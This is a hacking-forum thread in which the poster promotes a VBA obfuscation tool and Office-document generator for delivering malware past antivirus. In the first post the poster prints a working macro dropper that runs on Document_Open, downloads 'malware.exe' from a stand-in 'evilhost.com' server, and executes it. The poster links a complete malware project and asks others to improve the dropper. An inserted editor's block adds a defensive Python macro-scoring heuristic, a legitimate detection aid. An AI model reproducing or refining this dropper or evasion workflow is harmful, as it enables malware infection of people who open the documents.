
VBA Obfuscator/Encrypter + MS Office doc generator and questions regarding VB Script

  1. #1
    Sophie Pedophile Tech Support
    A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important, not only for opsec purposes but because the longer it takes researchers/AV companies to reverse engineer your malware, the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document, adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end I've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. Its features are as follows:
    • Encrypt all strings present in your VBA code
    • Encrypt data from your python Script in VBA code (domain names or paths for example)
    • Randomize each function's (or variable's) name
    • Choose Encryption method, how and where encryption keys are stored
    • Generate as many unique MS Office documents as you want using a file name list and a document template
    • Enable the auto-destruction of encryption keys feature once the VBA has been triggered once

    As I understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:

    Function [rdm::10]Test() '=> Test() will become randomized with a 10-character string
    [rdm::4]String_1 = "Test" '=> String_1 will become randomized with a 4-character string

    Depending on the values you set in config.py, a type of encryption is selected, among a number of other settings. Here's a screenshot of the script in action.

    Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

    Now, doing some research into malware deployed in this manner and relevant code examples written in VB Script, I kind of tried to jury-rig the following based on code found here.

    https://github.com/CloudStrief/xcode...doc/skript.txt
    Option Explicit

    Public CN As String
    Public APD As String
    Public UN As String
    Public HOSTNAME As String
    Public DROPPER_EXE As String
    Public PAYLOADS_FOLDER As String
    Public PAYLOAD_FILE As String

    Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
    End Function


    Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String

    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")

    oShell.Run APD + DROPPER_EXE
    FN = APD

    On Error GoTo 0
    End Sub

    Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
    End Sub

    Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE

    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"

    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
    End Function
    This is probably full of errors since I don't have a clue about Visual Basic/VBA/VBS, so I was wondering if you could help me improve this particular block of code. Interestingly enough, the original repo contains all you need, including the malware itself written in python and everything you need server side to deploy this. If you're interested, here's a link to the complete project.

    https://github.com/CloudStrief/xcode
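    Added here as an editor's example, not code from the thread or from the VBad/xcode projects: a Python heuristic that scores a macro on the indicators the feature list and the dropper above rely on (an auto-exec entry point, WScript.Shell / ADODB.Stream / XMLHTTP objects, Environ() lookups, and long high-entropy string literals of the kind string encryption leaves behind). The weights, thresholds and the sample macro are assumptions constructed for the example.

```python
import math
import re

# Constructed sample (not the code from the thread). It carries the indicators
# discussed above: an auto-exec entry point, shell/stream/HTTP objects, Environ()
# and one long high-entropy string of the kind VBad's string encryption produces.
SUSPICIOUS_SAMPLE = '''Sub Document_Open()
    Dim o
    Set o = CreateObject("WScript.Shell")
    Set s = CreateObject("ADODB.Stream")
    Set h = CreateObject("Microsoft.XMLHTTP")
    t = Environ("TMP")
    k = "Kq7xV2pLm9ZaT4rWe1YbN8cHs6dJg3fU0iOkP5vA"
End Sub
'''

AUTOEXEC = re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|AutoClose)\b", re.I)
COM_OBJECTS = ("WScript.Shell", "Shell.Application", "ADODB.Stream",
               "Microsoft.XMLHTTP", "MSXML2.XMLHTTP", "WinHttp.WinHttpRequest")
ENVIRON = re.compile(r"\bEnviron\s*\(", re.I)
STRING_LITERAL = re.compile(r'"([^"\n]*)"')

def shannon_entropy(s: str) -> float:
    """Bits per character; random or encrypted blobs score high, English text low."""
    n = len(s)
    if n == 0:
        return 0.0
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def score_macro(vba: str) -> dict:
    """Tally indicators and return an additive score (weights/thresholds are assumed, not tuned)."""
    lowered = vba.lower()
    hits = {
        "autoexec": sorted(set(AUTOEXEC.findall(vba))),
        "com_objects": [o for o in COM_OBJECTS if o.lower() in lowered],
        "environ": bool(ENVIRON.search(vba)),
        # string literals of 32+ chars at >= 4 bits/char look like encoded/encrypted data
        "blob_strings": [s for s in STRING_LITERAL.findall(vba)
                         if len(s) >= 32 and shannon_entropy(s) >= 4.0],
    }
    score = (3 * len(hits["autoexec"]) + 2 * len(hits["com_objects"])
             + int(hits["environ"]) + 2 * len(hits["blob_strings"]))
    hits["score"] = score
    hits["verdict"] = "suspicious" if score >= 5 else "benign"
    return hits
```

    Run it over VBA extracted from a document (for example with olevba) to get a quick triage verdict before deeper analysis.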
  2. #2
    SBTlauien African Astronaut
    Holy shit, I remember learning Visual Basic way back in high school, in the late 90's. QBASIC, then Visual Basic. I loved it, but don't remember much about the syntax.
  3. #3
    Industrial Houston
    haha, nice try, but you probably infected the text with some virus and if I copy it I will be infected, nice try, l0ser
  4. #4
    Sophie Pedophile Tech Support
    haha, nice try, but you probably infected the text with some virus and if I copy it I will be infected, nice try, l0ser

    I know you're bullshitting me but your troll isn't even realistic.

    1. What text, and why on earth would you need to copy it?
    2. If you're referring to the code, source code doesn't just spring to life on its own.
    3. If you were able to read source code you'd know exactly what would happen if you ran this code.

    Now I don't even know Visual Basic, but I do know python, as such I can tell what the VB code is meant to do, broadly speaking. It's meant to contact a server, drop an executable and run it. Now the trick is that the python program I linked to embeds the VB code into an MS Office document as a macro.

    Finally, my default assumption is that everyone here, as in, at least the T&T regulars, are better programmers than me. As such I wouldn't presume to be able to trick anyone by posting source code alone. But then again, the only kind of programming you do is graphics related, isn't that right? That's objectively the most useless form of programming ever. Graphics related programming is like the liberal arts studies of computer science.
  5. #5
    Sophie Pedophile Tech Support
    Bump for VBA improvement pl0x.